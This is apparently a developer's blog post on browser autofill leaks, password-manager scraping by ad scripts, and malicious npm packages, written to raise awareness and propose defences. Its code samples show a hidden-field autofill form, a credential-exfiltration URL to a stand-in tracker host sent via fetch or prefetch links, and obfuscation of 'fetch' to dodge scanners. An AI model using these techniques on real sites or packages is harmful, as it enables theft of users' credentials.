👋 This post also got published on Medium. If you like it, please give it
some love over there.
In late 2016, Stoyan Stefanov published “Oversharing with the browser’s autofill”, an article on stealing personal data through the browser’s form autofill feature. The attack works by leveraging the fact that autocompletion will also fill in fields which are visually hidden.
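As a sketch of the idea (the form, field names, and styling here are all illustrative, not taken from the original article): the user sees and fills one innocent field, but autofill may happily complete the off-screen ones too.

```html
<!-- The user only sees the name field… -->
<form action="https://example.com/subscribe" method="post">
  <input type="text" name="name" autocomplete="name">
  <!-- …but autofill may also complete these visually hidden fields -->
  <input type="text" name="email" autocomplete="email"
         style="position: absolute; left: -9999px;">
  <input type="text" name="phone" autocomplete="tel"
         style="position: absolute; left: -9999px;">
  <button>Subscribe</button>
</form>
```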
Note: it was only in January 2017 that this type of exploit gained traction, and it was attributed to the wrong person (see this ZDNet article for example). As Stoyan points out in his article, it had been warned about as early as 2013.
If it’s any comfort: you’re only leaking data once you enter data into one field and subsequently choose to autocomplete.
Fast forward to late 2017: In “No boundaries for user identities: Web trackers exploit browser login managers” the autocomplete feature of password managers is abused by rogue advertising scripts.
Since your password manager (and your browser itself) will prefill usernames and passwords, any loaded script can read them out and do whatever it wants with them. Unlike the autocomplete attack above, this kind of leak happens automatically. At least two advertising scripts have been identified as using this technique to collect usernames.
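A minimal sketch of what such a rogue script could do with the prefilled values (the tracker domain and field names are made up for illustration):

```javascript
// Sketch: serialize stolen form values into an exfiltration URL.
// In a browser, the values would come straight from the DOM, e.g.:
//   const values = {
//     username: document.querySelector('input[name=username]').value,
//     password: document.querySelector('input[name=password]').value,
//   };
function buildExfilUrl(values) {
  const query = new URLSearchParams(values).toString();
  return 'https://tracker.example/collect?' + query;
}

console.log(buildExfilUrl({ username: 'jane@example.com', password: 'hunter2' }));
// → https://tracker.example/collect?username=jane%40example.com&password=hunter2
```

From there it’s a single request — an image beacon, a fetch, or (as below) a prefetch link — and the credentials are gone.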
The only way to prevent this is for browsers to return empty strings for autocompleted values when they are read out from JavaScript, or to at least present a confirm dialog (and pause the JS runtime) until the read is approved.
In “I’m harvesting credit card numbers and passwords from your site. Here’s how.”, David Gilbertson took it up a notch:
I can’t believe people spend so much time messing around with cross-site scripting to get code into a single site. It’s so easy to ship malicious code to thousands of websites, with a little help from my web developer friends.
I know, the previously mentioned attacks weren’t XSS attacks, yet one could perform them after injecting a remote script 😉
All you have to do is write a successful NPM package which others will use. Popular ones are things like logging libraries (*), which have many, many downloads. If you then release a version with some rogue code …
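The distribution channel here is the default semver range: a dependency declared with a caret range will automatically pull in the next patch or minor release on a fresh install. A hypothetical example (package name and versions made up):

```json
{
  "dependencies": {
    "popular-logging-lib": "^1.4.0"
  }
}
```

With this in place, publishing a rogue 1.4.1 is enough — every consumer picks it up on their next dependency install, no action required on their part.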
(*) Speaking of: my Colored Line Formatter for Monolog has surpassed 250K downloads this week!
Would this kind of rogue code be detected easily? Not really. The versions that get published on NPM are compiled and minified, and are nowhere to be found in the source repo. On top of that, the compiled code can be obfuscated so that words like fetch don’t appear in it. And requests performed via dynamically injected links with a rel="prefetch" attribute can bypass Content Security Policies.
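The obfuscation part can be as simple as assembling the API name at runtime — the exact technique rogue scripts use varies, but here is one illustrative way to keep the literal word out of the shipped source:

```javascript
// Build the function name from character codes so a plain-text
// scan of the bundle for "fetch" turns up nothing.
const name = String.fromCharCode(102, 101, 116, 99, 104); // f, e, t, c, h

// In a browser, the call could then be made indirectly:
//   window[name]('https://tracker.example/collect?data=' + payload);
// …or, to dodge CSP connect-src rules, via an injected prefetch link:
//   const link = document.createElement('link');
//   link.rel = 'prefetch';
//   link.href = 'https://tracker.example/collect?data=' + payload;
//   document.head.appendChild(link);
console.log(name); // "fetch"
```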
One of the missing packages – namely pinkie-promise – is used by eslint, which itself is used just about everywhere. Because of this, installing dependencies in React-based apps didn’t work anymore.
By now the issue has been resolved (postmortem here), yet the window between Jan 06, 2018 - 19:45 UTC (identified) and Jan 06, 2018 - 21:58 UTC (resolved) was a very dangerous one. In that window, any developer could publish (and some did!) packages with the same names. Mostly these were re-publishes of the actual packages, yet one could also have published rogue versions such as the ones described above.
NPM is already fighting name squatters by disallowing variants with punctuation and by promoting the use of username-scoped packages, but I personally think an extra feature is missing: upon unpublishing of a package (be it by accident or not), its name should be quarantined for 30 days. In that 30-day window, no NPM user other than the original one should be able to republish a package with the same name. Additionally, there should be an option for the original author to release or transfer a package name to another NPM user.
I don’t run ads on my blog, nor do I do this for profit. A donation, however, would always put a smile on my face. Thanks!